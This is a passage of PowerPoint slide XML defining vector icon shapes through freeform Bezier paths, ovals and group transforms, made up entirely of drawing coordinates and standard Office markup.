                    <a:pt x="1321" y="824"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1321" y="866"/>
                    <a:pt x="1287" y="901"/>
                    <a:pt x="1245" y="901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1203" y="901"/>
                    <a:pt x="1169" y="866"/>
                    <a:pt x="1169" y="824"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1169" y="782"/>
                    <a:pt x="1203" y="749"/>
                    <a:pt x="1245" y="749"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="230" y="138"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="272" y="138"/>
                    <a:pt x="305" y="172"/>
                    <a:pt x="305" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="305" y="256"/>
                    <a:pt x="272" y="290"/>
                    <a:pt x="230" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="290"/>
                    <a:pt x="154" y="256"/>
                    <a:pt x="154" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="172"/>
                    <a:pt x="188" y="138"/>
                    <a:pt x="230" y="138"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1245" y="428"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1339" y="428"/>
                    <a:pt x="1418" y="368"/>
                    <a:pt x="1447" y="283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1550" y="283"/>
                    <a:pt x="1550" y="283"/>
                    <a:pt x="1550" y="283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1570" y="342"/>
                    <a:pt x="1615" y="389"/>
                    <a:pt x="1671" y="412"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1671" y="881"/>
                    <a:pt x="1671" y="881"/>
                    <a:pt x="1671" y="881"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1406" y="1147"/>
                    <a:pt x="1406" y="1147"/>
                    <a:pt x="1406" y="1147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="824" y="1147"/>
                    <a:pt x="824" y="1147"/>
                    <a:pt x="824" y="1147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="824" y="1028"/>
                    <a:pt x="824" y="1028"/>
                    <a:pt x="824" y="1028"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="909" y="1000"/>
                    <a:pt x="970" y="919"/>
                    <a:pt x="970" y="824"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="970" y="707"/>
                    <a:pt x="874" y="611"/>
                    <a:pt x="756" y="611"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="639" y="611"/>
                    <a:pt x="544" y="707"/>
                    <a:pt x="544" y="824"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="544" y="918"/>
                    <a:pt x="603" y="998"/>
                    <a:pt x="686" y="1027"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="686" y="1399"/>
                    <a:pt x="686" y="1399"/>
                    <a:pt x="686" y="1399"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="603" y="1428"/>
                    <a:pt x="544" y="1508"/>
                    <a:pt x="544" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="544" y="1719"/>
                    <a:pt x="639" y="1815"/>
                    <a:pt x="756" y="1815"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="874" y="1815"/>
                    <a:pt x="970" y="1719"/>
                    <a:pt x="970" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="970" y="1507"/>
                    <a:pt x="909" y="1426"/>
                    <a:pt x="824" y="1398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="824" y="1285"/>
                    <a:pt x="824" y="1285"/>
                    <a:pt x="824" y="1285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1463" y="1285"/>
                    <a:pt x="1463" y="1285"/>
                    <a:pt x="1463" y="1285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1808" y="939"/>
                    <a:pt x="1808" y="939"/>
                    <a:pt x="1808" y="939"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1808" y="421"/>
                    <a:pt x="1808" y="421"/>
                    <a:pt x="1808" y="421"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1899" y="396"/>
                    <a:pt x="1966" y="313"/>
                    <a:pt x="1966" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1966" y="96"/>
                    <a:pt x="1869" y="0"/>
                    <a:pt x="1752" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1659" y="0"/>
                    <a:pt x="1578" y="61"/>
                    <a:pt x="1550" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1447" y="145"/>
                    <a:pt x="1447" y="145"/>
                    <a:pt x="1447" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1418" y="61"/>
                    <a:pt x="1339" y="0"/>
                    <a:pt x="1245" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1127" y="0"/>
                    <a:pt x="1031" y="96"/>
                    <a:pt x="1031" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1031" y="332"/>
                    <a:pt x="1127" y="428"/>
                    <a:pt x="1245" y="428"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="833" y="1601"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="833" y="1643"/>
                    <a:pt x="798" y="1677"/>
                    <a:pt x="756" y="1677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="714" y="1677"/>
                    <a:pt x="681" y="1643"/>
                    <a:pt x="681" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="681" y="1559"/>
                    <a:pt x="714" y="1525"/>
                    <a:pt x="756" y="1525"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="798" y="1525"/>
                    <a:pt x="833" y="1559"/>
                    <a:pt x="833" y="1601"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="756" y="901"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="714" y="901"/>
                    <a:pt x="681" y="866"/>
                    <a:pt x="681" y="824"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="681" y="782"/>
                    <a:pt x="714" y="749"/>
                    <a:pt x="756" y="749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="798" y="749"/>
                    <a:pt x="833" y="782"/>
                    <a:pt x="833" y="824"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="833" y="866"/>
                    <a:pt x="798" y="901"/>
                    <a:pt x="756" y="901"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1752" y="138"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1794" y="138"/>
                    <a:pt x="1829" y="172"/>
                    <a:pt x="1829" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1829" y="256"/>
                    <a:pt x="1794" y="290"/>
                    <a:pt x="1752" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1710" y="290"/>
                    <a:pt x="1676" y="256"/>
                    <a:pt x="1676" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1676" y="172"/>
                    <a:pt x="1710" y="138"/>
                    <a:pt x="1752" y="138"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1245" y="138"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1287" y="138"/>
                    <a:pt x="1321" y="172"/>
                    <a:pt x="1321" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1321" y="256"/>
                    <a:pt x="1287" y="290"/>
                    <a:pt x="1245" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1203" y="290"/>
                    <a:pt x="1169" y="256"/>
                    <a:pt x="1169" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1169" y="172"/>
                    <a:pt x="1203" y="138"/>
                    <a:pt x="1245" y="138"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1806" y="1940"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1806" y="1807"/>
                    <a:pt x="1806" y="1807"/>
                    <a:pt x="1806" y="1807"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1894" y="1780"/>
                    <a:pt x="1959" y="1698"/>
                    <a:pt x="1959" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1959" y="1483"/>
                    <a:pt x="1863" y="1387"/>
                    <a:pt x="1745" y="1387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1627" y="1387"/>
                    <a:pt x="1531" y="1483"/>
                    <a:pt x="1531" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1531" y="1692"/>
                    <a:pt x="1588" y="1770"/>
                    <a:pt x="1668" y="1801"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1668" y="1957"/>
                    <a:pt x="1668" y="1957"/>
                    <a:pt x="1668" y="1957"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1619" y="1980"/>
                    <a:pt x="1581" y="2021"/>
                    <a:pt x="1561" y="2073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1463" y="2073"/>
                    <a:pt x="1463" y="2073"/>
                    <a:pt x="1463" y="2073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1432" y="1992"/>
                    <a:pt x="1355" y="1935"/>
                    <a:pt x="1264" y="1935"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1146" y="1935"/>
                    <a:pt x="1051" y="2031"/>
                    <a:pt x="1051" y="2150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1051" y="2268"/>
                    <a:pt x="1146" y="2364"/>
                    <a:pt x="1264" y="2364"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1360" y="2364"/>
                    <a:pt x="1443" y="2300"/>
                    <a:pt x="1469" y="2211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1556" y="2211"/>
                    <a:pt x="1556" y="2211"/>
                    <a:pt x="1556" y="2211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1582" y="2300"/>
                    <a:pt x="1664" y="2364"/>
                    <a:pt x="1761" y="2364"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1878" y="2364"/>
                    <a:pt x="1975" y="2268"/>
                    <a:pt x="1975" y="2150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1975" y="2047"/>
                    <a:pt x="1902" y="1961"/>
                    <a:pt x="1806" y="1940"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1264" y="2226"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1223" y="2226"/>
                    <a:pt x="1188" y="2192"/>
                    <a:pt x="1188" y="2150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1188" y="2108"/>
                    <a:pt x="1223" y="2073"/>
                    <a:pt x="1264" y="2073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1306" y="2073"/>
                    <a:pt x="1340" y="2108"/>
                    <a:pt x="1340" y="2150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1340" y="2192"/>
                    <a:pt x="1306" y="2226"/>
                    <a:pt x="1264" y="2226"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1745" y="1525"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1787" y="1525"/>
                    <a:pt x="1821" y="1559"/>
                    <a:pt x="1821" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1821" y="1643"/>
                    <a:pt x="1787" y="1677"/>
                    <a:pt x="1745" y="1677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1703" y="1677"/>
                    <a:pt x="1668" y="1643"/>
                    <a:pt x="1668" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1668" y="1559"/>
                    <a:pt x="1703" y="1525"/>
                    <a:pt x="1745" y="1525"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1761" y="2226"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1719" y="2226"/>
                    <a:pt x="1685" y="2192"/>
                    <a:pt x="1685" y="2150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1685" y="2108"/>
                    <a:pt x="1719" y="2073"/>
                    <a:pt x="1761" y="2073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1803" y="2073"/>
                    <a:pt x="1837" y="2108"/>
                    <a:pt x="1837" y="2150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1837" y="2192"/>
                    <a:pt x="1803" y="2226"/>
                    <a:pt x="1761" y="2226"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1217" y="1810"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1232" y="1813"/>
                    <a:pt x="1248" y="1815"/>
                    <a:pt x="1264" y="1815"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1382" y="1815"/>
                    <a:pt x="1477" y="1719"/>
                    <a:pt x="1477" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1477" y="1483"/>
                    <a:pt x="1382" y="1387"/>
                    <a:pt x="1264" y="1387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1146" y="1387"/>
                    <a:pt x="1051" y="1483"/>
                    <a:pt x="1051" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1051" y="1651"/>
                    <a:pt x="1068" y="1699"/>
                    <a:pt x="1098" y="1736"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="867" y="1966"/>
                    <a:pt x="867" y="1966"/>
                    <a:pt x="867" y="1966"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="835" y="1947"/>
                    <a:pt x="797" y="1935"/>
                    <a:pt x="756" y="1935"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="666" y="1935"/>
                    <a:pt x="589" y="1992"/>
                    <a:pt x="557" y="2073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="412" y="2073"/>
                    <a:pt x="412" y="2073"/>
                    <a:pt x="412" y="2073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="2021"/>
                    <a:pt x="354" y="1980"/>
                    <a:pt x="306" y="1957"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="306" y="1025"/>
                    <a:pt x="306" y="1025"/>
                    <a:pt x="306" y="1025"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="994"/>
                    <a:pt x="443" y="916"/>
                    <a:pt x="443" y="824"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="443" y="707"/>
                    <a:pt x="347" y="611"/>
                    <a:pt x="230" y="611"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="611"/>
                    <a:pt x="16" y="707"/>
                    <a:pt x="16" y="824"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="921"/>
                    <a:pt x="80" y="1003"/>
                    <a:pt x="169" y="1030"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="1940"/>
                    <a:pt x="169" y="1940"/>
                    <a:pt x="169" y="1940"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="1961"/>
                    <a:pt x="0" y="2047"/>
                    <a:pt x="0" y="2150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2268"/>
                    <a:pt x="95" y="2364"/>
                    <a:pt x="214" y="2364"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="2364"/>
                    <a:pt x="392" y="2300"/>
                    <a:pt x="418" y="2211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="552" y="2211"/>
                    <a:pt x="552" y="2211"/>
                    <a:pt x="552" y="2211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="578" y="2300"/>
                    <a:pt x="661" y="2364"/>
                    <a:pt x="756" y="2364"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="874" y="2364"/>
                    <a:pt x="970" y="2268"/>
                    <a:pt x="970" y="2150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="970" y="2123"/>
                    <a:pt x="965" y="2097"/>
                    <a:pt x="956" y="2073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1217" y="1810"/>
                    <a:pt x="1217" y="1810"/>
                    <a:pt x="1217" y="1810"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1217" y="1810"/>
                    <a:pt x="1217" y="1810"/>
                    <a:pt x="1217" y="1810"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1264" y="1525"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1306" y="1525"/>
                    <a:pt x="1340" y="1559"/>
                    <a:pt x="1340" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1340" y="1643"/>
                    <a:pt x="1306" y="1677"/>
                    <a:pt x="1264" y="1677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1223" y="1677"/>
                    <a:pt x="1188" y="1643"/>
                    <a:pt x="1188" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1188" y="1559"/>
                    <a:pt x="1223" y="1525"/>
                    <a:pt x="1264" y="1525"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="214" y="2226"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="2226"/>
                    <a:pt x="137" y="2192"/>
                    <a:pt x="137" y="2150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="2108"/>
                    <a:pt x="172" y="2073"/>
                    <a:pt x="214" y="2073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="2073"/>
                    <a:pt x="290" y="2108"/>
                    <a:pt x="290" y="2150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="2192"/>
                    <a:pt x="256" y="2226"/>
                    <a:pt x="214" y="2226"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="230" y="901"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="901"/>
                    <a:pt x="154" y="866"/>
                    <a:pt x="154" y="824"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="782"/>
                    <a:pt x="188" y="749"/>
                    <a:pt x="230" y="749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="272" y="749"/>
                    <a:pt x="305" y="782"/>
                    <a:pt x="305" y="824"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="305" y="866"/>
                    <a:pt x="272" y="901"/>
                    <a:pt x="230" y="901"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="756" y="2226"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="714" y="2226"/>
                    <a:pt x="681" y="2192"/>
                    <a:pt x="681" y="2150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="681" y="2108"/>
                    <a:pt x="714" y="2073"/>
                    <a:pt x="756" y="2073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="798" y="2073"/>
                    <a:pt x="833" y="2108"/>
                    <a:pt x="833" y="2150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="833" y="2192"/>
                    <a:pt x="798" y="2226"/>
                    <a:pt x="756" y="2226"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="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653327" y="1510097"/>
              <a:ext cx="379256" cy="343278"/>
              <a:chOff x="513974" y="1616853"/>
              <a:chExt cx="454402" cy="411296"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="Freeform 111"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="513974" y="1616853"/>
                <a:ext cx="300038" cy="349250"/>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Oval 32"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="714682" y="1708261"/>
                <a:ext cx="217488" cy="21748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Oval 33"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="653287" y="1810661"/>
                <a:ext cx="217488" cy="21748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Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="673100" y="1733550"/>
                <a:ext cx="144463" cy="219075"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 31 w 488"/>
                  <a:gd name="T1" fmla="*/ 739 h 739"/>
                  <a:gd name="T2" fmla="*/ 34 w 488"/>
                  <a:gd name="T3" fmla="*/ 506 h 739"/>
                  <a:gd name="T4" fmla="*/ 202 w 488"/>
                  <a:gd name="T5" fmla="*/ 345 h 739"/>
                  <a:gd name="T6" fmla="*/ 282 w 488"/>
                  <a:gd name="T7" fmla="*/ 90 h 739"/>
                  <a:gd name="T8" fmla="*/ 458 w 488"/>
                  <a:gd name="T9" fmla="*/ 0 h 739"/>
                  <a:gd name="T10" fmla="*/ 458 w 488"/>
                  <a:gd name="T11" fmla="*/ 11 h 739"/>
                  <a:gd name="T12" fmla="*/ 327 w 488"/>
                  <a:gd name="T13" fmla="*/ 96 h 739"/>
                  <a:gd name="T14" fmla="*/ 288 w 488"/>
                  <a:gd name="T15" fmla="*/ 223 h 739"/>
                  <a:gd name="T16" fmla="*/ 348 w 488"/>
                  <a:gd name="T17" fmla="*/ 363 h 739"/>
                  <a:gd name="T18" fmla="*/ 487 w 488"/>
                  <a:gd name="T19" fmla="*/ 426 h 739"/>
                  <a:gd name="T20" fmla="*/ 488 w 488"/>
                  <a:gd name="T21" fmla="*/ 428 h 739"/>
                  <a:gd name="T22" fmla="*/ 488 w 488"/>
                  <a:gd name="T23" fmla="*/ 454 h 739"/>
                  <a:gd name="T24" fmla="*/ 485 w 488"/>
                  <a:gd name="T25" fmla="*/ 457 h 739"/>
                  <a:gd name="T26" fmla="*/ 441 w 488"/>
                  <a:gd name="T27" fmla="*/ 534 h 739"/>
                  <a:gd name="T28" fmla="*/ 441 w 488"/>
                  <a:gd name="T29" fmla="*/ 536 h 739"/>
                  <a:gd name="T30" fmla="*/ 415 w 488"/>
                  <a:gd name="T31" fmla="*/ 552 h 739"/>
                  <a:gd name="T32" fmla="*/ 413 w 488"/>
                  <a:gd name="T33" fmla="*/ 550 h 739"/>
                  <a:gd name="T34" fmla="*/ 277 w 488"/>
                  <a:gd name="T35" fmla="*/ 459 h 739"/>
                  <a:gd name="T36" fmla="*/ 36 w 488"/>
                  <a:gd name="T37" fmla="*/ 614 h 739"/>
                  <a:gd name="T38" fmla="*/ 40 w 488"/>
                  <a:gd name="T39" fmla="*/ 730 h 739"/>
                  <a:gd name="T40" fmla="*/ 38 w 488"/>
                  <a:gd name="T41" fmla="*/ 735 h 739"/>
                  <a:gd name="T42" fmla="*/ 32 w 488"/>
                  <a:gd name="T43" fmla="*/ 738 h 739"/>
                  <a:gd name="T44" fmla="*/ 31 w 488"/>
                  <a:gd name="T4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8" h="739">
                    <a:moveTo>
                      <a:pt x="31" y="739"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="660"/>
                      <a:pt x="0" y="583"/>
                      <a:pt x="34" y="506"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="429"/>
                      <a:pt x="125" y="376"/>
                      <a:pt x="202" y="345"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="189" y="248"/>
                      <a:pt x="214" y="162"/>
                      <a:pt x="282" y="90"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="329" y="39"/>
                      <a:pt x="389" y="10"/>
                      <a:pt x="458" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="458" y="4"/>
                      <a:pt x="458" y="8"/>
                      <a:pt x="458" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="403" y="23"/>
                      <a:pt x="359" y="50"/>
                      <a:pt x="327" y="96"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="300" y="134"/>
                      <a:pt x="287" y="176"/>
                      <a:pt x="288" y="223"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="290" y="277"/>
                      <a:pt x="310" y="324"/>
                      <a:pt x="348" y="363"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="386" y="402"/>
                      <a:pt x="433" y="422"/>
                      <a:pt x="487" y="426"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="487" y="427"/>
                      <a:pt x="488" y="427"/>
                      <a:pt x="488" y="428"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="488" y="437"/>
                      <a:pt x="488" y="445"/>
                      <a:pt x="488" y="454"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="488" y="456"/>
                      <a:pt x="487" y="457"/>
                      <a:pt x="485" y="457"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="451" y="464"/>
                      <a:pt x="430" y="500"/>
                      <a:pt x="441" y="534"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="441" y="535"/>
                      <a:pt x="441" y="535"/>
                      <a:pt x="441" y="536"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="433" y="542"/>
                      <a:pt x="424" y="547"/>
                      <a:pt x="415" y="552"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="414" y="551"/>
                      <a:pt x="414" y="550"/>
                      <a:pt x="413" y="550"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="380" y="501"/>
                      <a:pt x="335" y="470"/>
                      <a:pt x="277" y="459"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="169" y="439"/>
                      <a:pt x="63" y="507"/>
                      <a:pt x="36" y="614"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="653"/>
                      <a:pt x="27" y="692"/>
                      <a:pt x="40" y="730"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="733"/>
                      <a:pt x="40" y="734"/>
                      <a:pt x="38" y="735"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="736"/>
                      <a:pt x="34" y="737"/>
                      <a:pt x="32" y="738"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="738"/>
                      <a:pt x="32" y="738"/>
                      <a:pt x="31" y="7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6"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="823913" y="1733550"/>
